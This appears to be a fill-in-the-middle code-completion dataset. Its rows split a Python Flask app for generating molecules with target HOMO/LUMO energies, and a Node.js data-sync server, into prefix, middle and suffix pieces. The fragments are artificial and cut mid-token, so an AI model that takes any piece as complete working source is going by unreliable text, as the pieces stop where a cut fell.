file_name
large_stringlengths 4
140
| prefix
large_stringlengths 0
12.1k
| suffix
large_stringlengths 0
12k
| middle
large_stringlengths 0
7.51k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
web_8_ReduceMemory.py
|
(SMILES_CHARS))
def
|
(smiles, maxlen=34):
#print(smiles)
#smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))
#print(smiles)
X = np.zeros((maxlen, len(SMILES_CHARS)))
for i, c in enumerate(smiles):
#print(i)
#print(c)
X[i, smi2index[c]] = 1
return X
def smiles_decoder( X ):
smi = ''
X = X.argmax( axis=-1 )
for i in X:
smi += index2smi[ i ]
return smi
def dist_cal(latent_space_train, pos, dim = 0.5):
#dist = (latent_space_train - pos)**dim
dist = (latent_space_train - pos)**dim
dist = np.sum(dist, axis=1)
dist = dist**(1/dim)
return(dist)
def load_model_data():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
global homo_model, lumo_model, encoder, decoder
homo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_homo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
lumo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_lumo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
####using true properties value to cal value_func
##normalize to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
outt = np.delete(outt, 0, 0)
return(outt)
########webbbbbb
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
y_homo = y_homo,
y_lumo = y_lumo
)
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: prediction of desired space. contain ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: The prediction from the pd_desire in desired Eudicean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', '
|
smiles_encoder
|
identifier_name
|
web_8_ReduceMemory.py
|
(SMILES_CHARS))
def smiles_encoder(smiles, maxlen=34):
#print(smiles)
#smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))
#print(smiles)
X = np.zeros((maxlen, len(SMILES_CHARS)))
for i, c in enumerate(smiles):
#print(i)
#print(c)
X[i, smi2index[c]] = 1
return X
def smiles_decoder( X ):
smi = ''
X = X.argmax( axis=-1 )
for i in X:
smi += index2smi[ i ]
return smi
def dist_cal(latent_space_train, pos, dim = 0.5):
#dist = (latent_space_train - pos)**dim
dist = (latent_space_train - pos)**dim
dist = np.sum(dist, axis=1)
dist = dist**(1/dim)
return(dist)
def load_model_data():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
global homo_model, lumo_model, encoder, decoder
homo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_homo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
lumo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_lumo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
####using true properties value to cal value_func
##normalize to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
|
outt = np.delete(outt, 0, 0)
return(outt)
########webbbbbb
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
y_homo = y_homo,
y_lumo = y_lumo
)
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: prediction of desired space. contain ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: The prediction from the pd_desire in desired Eudicean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', 'des
|
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
|
conditional_block
|
web_8_ReduceMemory.py
|
(SMILES_CHARS))
def smiles_encoder(smiles, maxlen=34):
#print(smiles)
#smiles = Chem.MolToSmiles(Chem.MolFromSmiles(smiles))
#print(smiles)
X = np.zeros((maxlen, len(SMILES_CHARS)))
for i, c in enumerate(smiles):
#print(i)
#print(c)
X[i, smi2index[c]] = 1
return X
def smiles_decoder( X ):
smi = ''
X = X.argmax( axis=-1 )
for i in X:
smi += index2smi[ i ]
return smi
def dist_cal(latent_space_train, pos, dim = 0.5):
#dist = (latent_space_train - pos)**dim
dist = (latent_space_train - pos)**dim
dist = np.sum(dist, axis=1)
dist = dist**(1/dim)
return(dist)
def load_model_data():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
global homo_model, lumo_model, encoder, decoder
homo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_homo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
lumo_model = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_lumo_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
####using true properties value to cal value_func
##normalize to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
outt = np.delete(outt, 0, 0)
return(outt)
########webbbbbb
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
|
y_homo = y_homo,
y_lumo = y_lumo
)
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: prediction of desired space. contain ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: The prediction from the pd_desire in desired Eudicean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', 'desire
|
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
|
identifier_body
|
web_8_ReduceMemory.py
|
_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
encoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_encoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder = keras.models.load_model("./keras_model/holu_retrain/ep100_holu_decoder_retrain_Weipp1.h5", custom_objects={'x_pred': reconstruct_error, 'kl_loss': kl_loss, 'homo_loss': mse_loss, 'lumo_loss': mse_loss})
decoder._make_predict_function()
#####data
def add_space(raw_data, input_dim = 34):
out = []
for i in raw_data:
if len(i) < input_dim:
out.append(i+' '*(input_dim - len(i)))
else:
out.append(i)
return(out)
global out
out_raw = pd.read_csv('./QM9_data/QM9_smiles.csv', header = None)[0]
out = add_space(out_raw)
QM9_hot = []
for i in out:
QM9_hot.append(smiles_encoder(i))
#properties
QM9_properties = pd.read_csv('./QM9_data/QM9_properties.csv')
QM9_properties.columns = ['tag', 'index', 'A', 'B', 'C', 'mu', 'alpha', 'homo', 'lumo',
'gap', 'r2', 'zpve', 'U0', 'U', 'H', 'G', 'Cv']
global x_train, y_homo, y_lumo
x_train = QM9_hot
x_train = np.reshape(x_train, (len(x_train), 34, 22))
y_homo = QM9_properties['homo']
y_homo = np.reshape(y_homo, (len(y_homo)))
y_lumo = QM9_properties['lumo']
y_lumo = np.reshape(y_lumo, (len(y_lumo)))
global latent_space_train
latent_space_train= encoder.predict(x_train)[0][:,:156]
global prediction_homo, prediction_lumo
prediction_homo = homo_model.predict(encoder.predict(x_train)[1])
prediction_lumo = lumo_model.predict(encoder.predict(x_train)[1])
def value_func(homo_desire, lumo_desire, y_homo, y_lumo, std = 0.1):
####using true properties value to cal value_func
##normalize to 0 - 1
homo_value_fun = norm.pdf(y_homo, homo_desire, std)/norm.pdf(homo_desire, homo_desire, std)
lumo_value_fun = norm.pdf(y_lumo, lumo_desire, std)/norm.pdf(lumo_desire, lumo_desire, std)
return(homo_value_fun*lumo_value_fun)
def ran_sphere(n = 10000, pos = np.array([0, 0]), dis = 5, dim = 156):
np.random.seed(random_seed)
random.seed(random_seed)
outt = np.array([None]*dim)
for i in range(n):
#d = 2
u = np.random.normal(0,1,dim) # an array of d normally distributed random variables
norm=np.sum(u**2) **(0.5)
r = random.random()**(1/dim)
x= dis*r*u/norm
x = x + pos
outt = np.vstack((outt, x))
outt = np.delete(outt, 0, 0)
return(outt)
########webbbbbb
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1
model = None
@app.route("/")
def index():
#name = request.args['name']
return render_template("request_holu.html");
@app.route('/result/',methods = ['POST', 'GET'])
def result():
if request.method == 'POST':
homo_desire = float(request.form['homo_desire'])
lumo_desire = float(request.form['lumo_desire'])
ramdom_sample_value = int(request.form['ramdom_sample_value'])
dis = int(request.form['dis'])
std = float(request.form['std'])
pd_desire, predict_list, opti, nei_t5, highest_desire_value_index = calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std)
return render_template("result.html",
homo_desire = homo_desire,
lumo_desire = lumo_desire,
ramdom_sample_value = ramdom_sample_value,
dis = dis,
std =std,
predict_list = predict_list,
highest_desire_value_index = highest_desire_value_index,
out = out,
y_homo = y_homo,
y_lumo = y_lumo
)
#@app.route("/calculation/<float(signed=True):homo_desire>/<float(signed=True):lumo_desire>/<int:ramdom_sample_value>/<int:dis>/<float:std>")
def calculation(homo_desire, lumo_desire, ramdom_sample_value, dis, std):
#pd_desire: prediction of desired space. contain ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction']
#predict_list: The prediction from the pd_desire in desired Eudicean distance
desire_value = value_func(homo_desire, lumo_desire, y_homo = y_homo, y_lumo = y_lumo, std = std)
highest_desire_value_index = np.argsort(desire_value)[-1]
desire_space = ran_sphere(n = ramdom_sample_value, pos = latent_space_train[highest_desire_value_index], dis = dis).reshape(-1,156)
decode_m = decoder.predict(desire_space)
desire_homo_prediction = homo_model.predict(desire_space)
desire_lumo_prediction = lumo_model.predict(desire_space)
predict_st = []
for i in decode_m:
predict_st.append(smiles_decoder(i))
predict_dict_uniq = np.unique(predict_st)
###
valid_molecular = []
for i, x in enumerate(predict_dict_uniq):
#print(x)
m = Chem.MolFromSmiles(x, sanitize=False)
if m is None:
valid_molecular.append('XXXXX')
else:
valid_molecular.append(x)
###
final_prediction = []
predict_dict = { i : 0 for i in valid_molecular }
for i in predict_st:
if i in predict_dict:
predict_dict[i] += 1
final_prediction.append(i)
else:
predict_dict['XXXXX'] += 1
final_prediction.append('XXXXX')
opti = pca.transform(latent_space_train[highest_desire_value_index].reshape(1,156))
nei_t5 = pca.transform(desire_space)
pd_desire = pd.DataFrame(data=nei_t5, columns = ['PCA1', 'PCA2'])
pd_desire = pd.concat([pd_desire, pd.DataFrame(desire_homo_prediction), pd.DataFrame(desire_lumo_prediction), pd.DataFrame(predict_st), pd.DataFrame(final_prediction), pd.DataFrame(desire_value)], axis = 1)
pd_desire.columns = ['PCA1', 'PCA2', 'desire_homo_prediction', 'desire_lumo_prediction', 'smiles', 'final_prediction', 'desire_value']
for i in predict_dict:
count_num = predict_dict[i]
predict_dict[i] = [round(predict_dict[i]/ramdom_sample_value, 3)]
if i in out:
y_homo_tem = y_homo[out.index(i)]
y_lumo_tem = y_lumo[out.index(i)]
else:
y_homo_tem = None
y_lumo_tem = None
pre_homo_tem_mean = pd_desire[pd_desire['smiles'] == i]['desire_homo_prediction'].mean()
pre_homo_tem_std = pd_desire[pd_desire['smiles'] == i]['desire_homo_prediction'].std()
pre_lumo_tem_mean = pd_desire[pd_desire['smiles'] == i]['desire_lumo_prediction'].mean()
pre_lumo_tem_std = pd_desire[pd_desire['smiles'] == i]['desire_lumo_prediction'].std()
desire_value_mean = pd_desire[pd_desire['smiles'] == i]['desire_value'].mean()
desire_value_std = pd_desire[pd_desire['smiles'] == i]['desire_value'].std()
predict_dict[i].extend([y_homo_tem, y_lumo_tem, pre_homo_tem_mean, pre_homo_tem_std, pre_lumo_tem_mean, pre_lumo_tem_std, count_num, desire_value_mean, desire_value_std])
predict_list = []
for key, value in predict_dict.items():
temp = [key,value]
predict_list.append(temp)
predict_list = sorted(predict_list, key=lambda l:l[1][7], reverse=True) ##sort by count number
#print(predict_list)
|
random_line_split
|
||
sync-server.js
|
before returning the response for the sync request. Default is true. */
syncReqWaitForAck: true,
/** @type {Number} Specify the max number of ack items will be processed for a single request. Default is -1 (unlimited).*/
syncReqAckLimit: -1,
/** @type {Function} Provide your own cuid generator. It should be a function and the `params` object will be passed to the generator.
* The `params` object will have the following fields:
* `params.query_params`: the query params used on the dataset
* `params.meta_data`: the meta data used on the dataset
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overidden in most cases. This should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err) {
return cb(err);
}
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
var ackWorkerOpts = {
name: 'ack_worker',
interval: syncConfig.ackWorkerInterval,
backoff: syncConfig.ackWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var j = 0; j < syncConfig.ackWorkerConcurrency; j++) {
var ackWorker = new Worker(ackQueue, ackProcessorImpl, metricsClient, ackWorkerOpts);
ackWorkers.push(ackWorker);
}
var pendingProcessorImpl = pendingProcessor(syncStorage, dataHandlers, hashProvider, metricsClient, syncConfig.pendingWorkerRetryLimit);
var pendingWorkerOpts = {
name: 'pending_worker',
interval: syncConfig.pendingWorkerInterval,
backoff: syncConfig.pendingWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var k = 0; k < syncConfig.pendingWorkerConcurrency; k++) {
